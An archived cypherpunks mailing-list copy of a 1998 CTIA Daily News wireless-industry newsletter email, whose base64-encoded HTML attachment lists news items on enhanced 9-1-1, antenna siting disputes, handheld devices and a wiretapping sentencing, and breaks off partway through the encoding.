iQCVAwUBNeRdFo9Co1n+aLhhAQErrAP/Qbb1Y50R7kKXaCs3V1EZZTmeCjZRiFVY
OZm6wJcP7fy/oI1TYXE3Pio21+tOZdizy4xISiydLcjgXx6YzwYLJIZh8lAskcHl
e/2/65X4oV9dWJYdTW+tbtOYLOY+qy8kGT/A1FOsotknPvy+0k/n2pVSNufBOQpg
LBPbuFSX6HU=
=Zsad
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 26 Aug 1998 12:56:18 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 26, 1998
Message-ID: <199808261903.OAA28710@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713796.multipart/mixed"

--Boundary..3995.1071713796.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 




--Boundary..3995.1071713796.multipart/mixed
Content-Type: application/octet-stream; name="bin00023.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00023.bin"
Content-Description: "_CTIA_Daily_News_19980826a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMjYsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPldoZWVsZXIgQ2FsbHMgZm9yIFVuaXRl
ZApFZmZvcnQgdG8gSW1wbGVtZW50IEVuaGFuY2VkIDktMS0xIENhbGxzIGZy
b20gV2lyZWxlc3MgUGhvbmVzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPlRoZSBoZWFkIG9mIHRoZSBDZWxsdWxhciBU
ZWxlY29tbXVuaWNhdGlvbnMKSW5kdXN0cnkgQXNzb2NpYXRpb24gdG9kYXkg
Y2FsbGVkIG9uIHRoZSBwdWJsaWMgc2FmZXR5IGNvbW11bmljYXRpb25zIGNv
bW11bml0eQp0byByZWFjdGl2YXRlIHRoZSBjb2FsaXRpb24gdGhhdCBkcmFm
dGVkIHRoZSBibHVlcHJpbnQgZm9yIGltcHJvdmVkIDktMS0xCmNvbW11bmlj
YXRpb25zIGluIG9yZGVyIHRvIG1ha2UgdGhhdCBibHVlcHJpbnQgYSByZWFs
aXR5LiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRz
L3Byb2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0z
MzM0Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VS5TLiBXaXJlbGVzcyBQcmVz
ZW50cwoiUmVhbCBUaW1lIiBMaXZlIE11bHRpcGxlLUNpdGllcyBUcmlhbHMm
bmJzcDs8L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxCPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5vZiBJdHMgUmFkaW9DYW1l
cmEgV2lyZWxlc3MKQ2FsbGVyLUxvY2F0aW9uIFRlY2hub2xvZ3kmbmJzcDs8
L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5hdCBDVElBIENvbmZlcmVuY2U8L0ZP
TlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhl
IHRyaWFscyBzaW11bHRhbmVvdXNseSBkZW1vbnN0cmF0ZWQKdGhlIENvbXBh
bnkncyB3aXJlbGVzcyBjYWxsZXIgbG9jYXRpb24gYW5kIHRyYWNraW5nIHRl
Y2hub2xvZ3kgaW4gdGhyZWUKY2l0aWVzIGFjcm9zcyB0aGUgY291bnRyeSwg
aW5jbHVkaW5nOiBCYWx0aW1vcmUsIE1hcnlsYW5kOyBPYWtsYW5kLCBDYWxp
Zm9ybmlhCmFuZCBCaWxsaW5ncywgTW9udGFuYS4gVGhlIHRyaWFscyBkZW1v
bnN0cmF0ZWQgY2FsbGVyIGRldGVjdGlvbiBhbmQgbG9jYXRpb24KcHJvY2Vz
c2luZyBmb3IgbXVsdGlwbGUgY2FsbHMgc2ltdWx0YW5lb3VzbHksIHVzaW5n
IG11bHRpcGxlIHNpdGVzIGF0IGVhY2gKbG9jYXRpb24sIHJlc3VsdGluZyB3
aXRoIHRoZSBsb2NhdGlvbiBhbmQgdHJhY2tpbmcgb2YgYWxsIGNhbGxzIG9u
IGEgQ29tcGFueQpkZXZlbG9wZWQgbWFwcGluZyBkaXNwbGF5LiAoPEEgSFJF
Rj0iaHR0cDovL2Jpei55YWhvby5jb20vYncvOTgwODI2L3Vfc193aXJlbGVf
MS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlUgUyBXRVNULCBYWVBPSU5U
IERlcGxveQpSZWFsLVRpbWUgV2lyZWxlc3MgRTktMS0xJm5ic3A7PC9GT05U
PjwvRk9OVD48L0I+CjxCUj48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+RGF0YWJhc2UgSW50ZXJjb25uZWN0aW9ucwpU
aHJvdWdob3V0IDE0IFN0YXRlczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj5UaGlzIG5ldHdvcmsgaW50ZXJjb25uZWN0
aW9uIHdpbGwgYWxsb3cKWFlQT0lOVCB0byB1cGRhdGUgdGhlIFUgUyBXRVNU
IEU5LTEtMSBkYXRhYmFzZXMgd2l0aCB0aGUgMTAtZGlnaXQgY2FsbGJhY2sK
bnVtYmVyIGFuZCBsb2NhdGlvbiBpbmZvcm1hdGlvbiBhc3NvY2lhdGVkIHdp
dGggYSB3aXJlbGVzcyBzdWJzY3JpYmVyJ3MKY2FsbCB0byA5LTEtMS4gVGhp
cyBpbmZvcm1hdGlvbiB3aWxsIHRoZW4gYmUgYXZhaWxhYmxlIGZvciByZXRy
aWV2YWwgYW5kCmRpc3BsYXkgYXQgdGhlIGVtZXJnZW5jeSBkaXNwYXRjaCBj
ZW50ZXIsIG9yIHB1YmxpYyBzYWZldHkgYW5zd2VyaW5nIHBvaW50CihQU0FQ
KSwgaGFuZGxpbmcgdGhlIDktMS0xIGNhbGwuICg8QSBIUkVGPSJodHRwOi8v
d3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3MvZnJh
bWVpbmRleC5jZm0/YXJ0aWNsZWlkPTMzMTYiPldPVy1DT008L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0rMT5IYW5kaGVsZCBNYWtlciBQbGFucwp0byBVbmRlcmN1dCBQYWxtUGls
b3Q8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+Um95YWwgQ29uc3VtZXIgQnVzaW5lc3MgUHJvZHVjdHMgaXMgcGxhbm5p
bmcKdG8gdGFrZSBhIGJpdGUgb3V0IG9mIDNDb20ncyBQYWxtUGlsb3QgYnVz
aW5lc3Mgd2l0aCB0aGUgZGFWaW5jaSBoYW5kaGVsZApkZXZpY2UsIGludHJv
ZHVjZWQgTW9uZGF5LCB0aGF0IG1pcnJvcnMgdGhlIFBhbG1QaWxvdCdzIGFw
cGVhcmFuY2UgYW5kCmZ1bmN0aW9uYWxpdHksIGJ1dCBjb3N0cyBhYm91dCA1
MCBwZXJjZW50IGxlc3MuICg8QSBIUkVGPSJodHRwOi8vd3d3LnRlY2h3ZWIu
Y29tL3dpcmUvc3RvcnkvVFdCMTk5ODA4MjVTMDAxMCI+VEVDSFdFQjwvQT4p
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBTSVpFPSsxPkVyaWNzc29uLCBTbWFydCBNb2R1bGFyClRlY2hub2xvZ2ll
cyBKb2luIHRvIEJyaW5nIEdTTSZuYnNwOzwvRk9OVD48L0ZPTlQ+PC9CPgo8
QlI+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPnRvIE1vYmlsZSBDb21wdXRpbmc8L0ZPTlQ+PC9GT05UPjwvQj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+U21hcnQgTW9kdWxhciB3aWxsIHNl
bGwgYSBsaW5lIG9mIFBDIGNhcmRzCnRoYXQgd2lsbCBub3Qgb25seSBzdXBw
b3J0IHdpcmVsZXNzIG5ldHdvcmtzIGJhc2VkIG9uIEdTTSwgYnV0IHdpbGwg
YWxzbwpydW4gZmF4IGFuZCBkYXRhIG9wZXJhdGlvbnMsIHN1Y2ggYXMgNTYt
a2lsb2JpdC1wZXItc2Vjb25kIHN5c3RlbXMgYW5kCklTRE4uICg8QSBIUkVG
PSJodHRwOi8vd3d3LnRlY2h3ZWIuY29tL3dpcmUvc3RvcnkvVFdCMTk5ODA4
MjVTMDAwMyI+VEVDSFdFQjwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPk11bmRlbGVpbiwgSWxs
LiBIaWdoClNjaG9vbCBEaXN0cmljdCAxMjAgQm9hcmQgUHVsbHMgUGx1ZyBv
biBCaWQmbmJzcDs8L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxCPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5mb3IgQW50ZW5u
YSBTaXRlPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPlRoZSBzY2hvb2wgZGlzdHJpY3QgYm9hcmQgcmVqZWN0ZWQgU3By
aW50J3MKcmVxdWVzdCBmb3IgYSAxNDAtZm9vdCB0b3dlciBvbiBzY2hvb2wg
cHJvcGVydHkuJm5ic3A7IFRoZSBib2FyZCBwcmVzaWRlbnQKc2FpZCB0aGF0
IGluIGhpcyAxOSB5ZWFycyBvbiB0aGUgYm9hcmQsIGhlIGhhZCBuZXZlciBy
ZWNlaXZlZCBtb3JlIGNhbGxzCm9yIGNvbW1lbnRzIGluIG9wcG9zaXRpb24g
dG8gYSBwcm9wb3NhbC4mbmJzcDsgVGhlIG9wcG9zaW5nIHZpZXdzIHdlcmUK
YmFzZWQgb24gc2FmZXR5LCBhZXN0aGV0aWNzLCBhbmQgdGhhdCB0aGUgc2No
b29sIHNob3VsZCBub3QgYmUgaW52b2x2ZWQKaW4gYSBwdXJlbHkgY29tbWVy
Y2lhbCB2ZW50dXJlLiAoPEEgSFJFRj0iaHR0cDovL2NoaWNhZ290cmlidW5l
LmNvbS9zcGxhc2gvYXJ0aWNsZS8wLDEwNTEsU0FWLTk4MDgyNjAxMTQsMDAu
aHRtbCI+Q0hJQ0FHTwpUUklCVU5FPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+TGVtb250LCBJ
bGwuLCBHcmFudHMKTmV4dGVsIExvbmcgVGVybSBMZWFzZSBmb3IgQW50ZW5u
YSBTaXRlJm5ic3A7PC9GT05UPjwvRk9OVD48L0I+CjxCUj48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+b24gV2F0ZXIg
VG93ZXI8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+VGhlIHZpbGxhZ2UgYm9hcmQgYXBwcm92ZWQgYSAyMC15ZWFyIGxl
YXNlCmF0ICQxLDUwMCBhIG1vbnRoIGZvciBhbiBpbml0aWFsIGZpdmUteWVh
ciB0ZXJtIHdpdGggYW4gb3B0aW9uIGZvciBhIHNlY29uZAp0ZXJtIG9mIDE1
IHllYXJzLiAoPEEgSFJFRj0iaHR0cDovL2NoaWNhZ290cmlidW5lLmNvbS9z
cGxhc2gvYXJ0aWNsZS8wLDEwNTEsU0FWLTk4MDgyNjAyOTIsMDAuaHRtbCI+
Q0hJQ0FHTwpUUklCVU5FPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Qmxvb21pbmdkYWxlLCBJ
bGwuIFRydXN0ZWVzCk9LIFNob3J0ZXIgQW50ZW5uYSBhZnRlciBBVCZhbXA7
VCBTdWVzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPlRoZSB0cnVzdGVlcyBhcHByb3ZlZCBhIHBsYW4gcGVybWl0dGlu
ZwphIDE1NS1mb290IG1vbm9wb2xlIHRvIGhvbGQgY29tbXVuaWNhdGlvbiBh
bnRlbm5hcyBhbmQgYSAyMDAtc3F1YXJlLWZvb3QKZXF1aXBtZW50IGJ1aWxk
aW5nLiBBVCZhbXA7VCB3aWxsIGJ1aWxkIG9uIGxlYXNlZCBwcm9wZXJ0eSBp
biBhbiBhcmVhIHpvbmVkCmFzIGEgYnVzaW5lc3MgcGFyay4mbmJzcDsgQVQm
YW1wO1QgaGFkIHJlcXVlc3RlZCBhIDE5Ni1mb290IHRvd2VyLiAoPEEgSFJF
Rj0iaHR0cDovL2NoaWNhZ290cmlidW5lLmNvbS9zcGxhc2gvYXJ0aWNsZS8w
LDEwNTEsU0FWLTk4MDgyNjAyODIsMDAuaHRtbCI+Q0hJQ0FHTwpUUklCVU5F
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+VmVybW9udCBFbnZpcm9ubWVudGFsCkJvYXJkIFJl
dm9rZXMgQW50ZW5uYSBTaXRlIFBlcm1pdDwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgcmV2b2NhdGlvbiBzdGF0
ZW1lbnQgc2F5cyBCZWxsIEF0bGFudGljCnZpb2xhdGVkIHBlcm1pdCBjb25k
aXRpb25zIGRlYWxpbmcgd2l0aCB0aGUgMTc4LWZvb3QgdG93ZXIncyB2aXNp
YmlsaXR5LgpPbmUgb2YgdGhlIGNvbmRpdGlvbnMgc2F5czogIlRoZSBmb3Jl
c3RsYW5kIHByb3ZpZGVzIHBhcnRpYWwgc2NyZWVuaW5nCmZvciB0aGUgdG93
ZXIuIFRoZSB0cmVlIGxpbmUgc2hhbGwgYmUgbWFpbnRhaW5lZCB0byBzaGll
bGQgdGhlIGxvd2VyIGhhbGYKb2YgdGhlIHRvd2VyLicnJm5ic3A7IEJlbGwg
QXRsYW50aWMgd29uIHBlcm1pc3Npb24gaW4gMTk5NiB0byBidWlsZCB0aGUK
dG93ZXIgb24gQmF4dGVyIE1vdW50YWluLiAoPEEgSFJFRj0iaHR0cDovL3d3
dy5ib3N0b24uY29tL2RhaWx5bmV3cy93aXJlaHRtbC8yMzgvRW52aXJvbm1l
bnRhbF9Cb2FyZF9yZXZva2VzX3Rvd2VyX3Auc2h0bWwiPkJPU1RPTgpHTE9C
RTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPlJvY2t3ZWxsIFNlbWljb25kdWN0b3IKSW50cm9k
dWNlcyBJdHMgRmlyc3QgQ2hpcHNldCZuYnNwOzwvRk9OVD48L0ZPTlQ+PC9C
Pgo8QlI+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPmZvciBDRE1BIFBob25lczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BY2NvcmRpbmcgdG8gUm9ja3dlbGws
IHRoZSBjaGlwc2V0IGlzCnRoZSBmaXJzdCBjb21wbGV0ZSwgaW50ZWdyYXRl
ZCByYWRpbyBmcmVxdWVuY3kgKFJGKSBzdWJzeXN0ZW0gZm9yIENETUEKYW5k
IENETUEgUGVyc29uYWwgQ29tbXVuaWNhdGlvbnMgU3lzdGVtIChQQ1MpIGRp
Z2l0YWwgY2VsbHVsYXIgcGhvbmVzIHdpdGgKc3VwcG9ydCBmb3IgQWR2YW5j
ZWQgTW9iaWxlIFBob25lIFN5c3RlbXMgKEFNUFMpIGFuYWxvZyBjZWxsdWxh
ciBzZXJ2aWNlLgooPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20vYncv
OTgwODI1L3JvY2t3ZWxsX3NfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
Pk5ldyBTdXJ2ZXkgUGFpbnRzIEdyaW0KUGljdHVyZSBvZiBEZXNrdG9wIFky
SyBDb21wbGlhbmNlPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPkFjY29yZGluZyB0byBhIHN1cnZleSBvZiA0LDQ0OSB0
b3AtbGV2ZWwKSW5mb3JtYXRpb24gVGVjaG5vbG9neSBtYW5hZ2VycyBhdCBG
b3J0dW5lIDEwMDAgY29tcGFuaWVzLCBtYW55IGNvbXBhbmllcwphcmUgdW5k
ZXJlc3RpbWF0aW5nIHdoYXQgaXQgd2lsbCB0YWtlIHRvIGVuc3VyZSB5ZWFy
IDIwMDAgY29tcGxpYW5jZSBhdAp0aGUgZGVza3RvcCBsZXZlbC4gKDxBIEhS
RUY9Imh0dHA6Ly93d3cuemRuZXQuY29tL3Bjd2Vlay9uZXdzLzA4MjQvMjVl
eTJrLmh0bWwiPlpETkVUPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VGVsZWNvbSBVbmlvbiBC
YXJnYWlucwpmcm9tIFN0cm9uZyBQb3NpdGlvbjwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5EZXJlZ3VsYXRpb24gbWF5
IGJlIGdpdmluZyB0aGUgQ29tbXVuaWNhdGlvbnMKV29ya2VycyBvZiBBbWVy
aWNhIHRoZSB1cHBlciBoYW5kIGluIHN0cmlrZSBuZWdvdGlhdGlvbnMuICg8
QSBIUkVGPSJodHRwOi8vd3d3LnRlY2h3ZWIuY29tL3dpcmUvc3RvcnkvVFdC
MTk5ODA4MjVTMDAxMiI+VEVDSFdFQjwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlNocmlua2lu
ZyBXaXJlbGVzcyBQaG9uZXMKQXJlIEdldHRpbmcgSW5jcmVkaWJseSBTbWFs
bGVyPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPlNpbmNlIDE5OTAsIHRoZSBtZWFuIHdlaWdodCBvZiB3aXJlbGVzcwpw
aG9uZXMgaGFzIGRlY3JlYXNlZCBmcm9tIDE0Ljkgb3VuY2VzIHRvIDcuNCBv
dW5jZXMuIENvbXBhbmllcyBzdWNoIGFzCk1vdG9yb2xhLCBFcmljc3Nvbiwg
TmV4dGVsLCBhbmQgTm9raWEgYXJlIGRldmVsb3BpbmcgcGhvbmVzIHRoYXQg
d2VpZ2gKYmV0d2VlbiAzLjEgb3VuY2VzIHRvIDQuOSBvdW5jZXMuIE5UVCBo
YXMgZGV2ZWxvcGVkIHRoZSB3b3JsZCdzIHNtYWxsZXN0CndpcmVsZXNzIHBo
b25lLS1hIHdyaXN0d2F0Y2ggcGhvbmUgdGhhdCB3ZWlnaHMgMS41OCBvdW5j
ZXMuICg8QSBIUkVGPSJodHRwOi8vd3d3LmRhbGxhc25ld3MuY29tL3RlY2hu
b2xvZ3ktbmYvdGVjaGJpejMwMy5odG0iPkRBTExBUwpNT1JOSU5HIE5FV1M8
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5Gb3JtZXIgQWxhbWFuY2UgQ291bnR5LApOLkMuIFBv
bGljZW1hbiBTZW50ZW5jZWQmbmJzcDs8QlI+Cm9uIFdpcmV0YXBwaW5nIENo
YXJnZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj5Gb3JtZXIgQWxhbWFuY2UgQ291bnR5LCBOLkMuLCBwb2xpY2Ugb2Zm
aWNlcgpKb2VsIERlYW4gV2FyZCB3YXMgc2VudGVuY2VkIGluIGEgVS5TLiBN
aWRkbGUgRGlzdHJpY3QgQ291cnQgb24gTW9uZGF5CmFmdGVyIHBsZWFkaW5n
IGd1aWx0eSB0byBjaGFyZ2VzIHRoYXQgaGUgdW5sYXdmdWxseSBpbnRlcmNl
cHRlZCBjZWxsdWxhcgpwaG9uZSBjb252ZXJzYXRpb25zLiAoPEEgSFJFRj0i
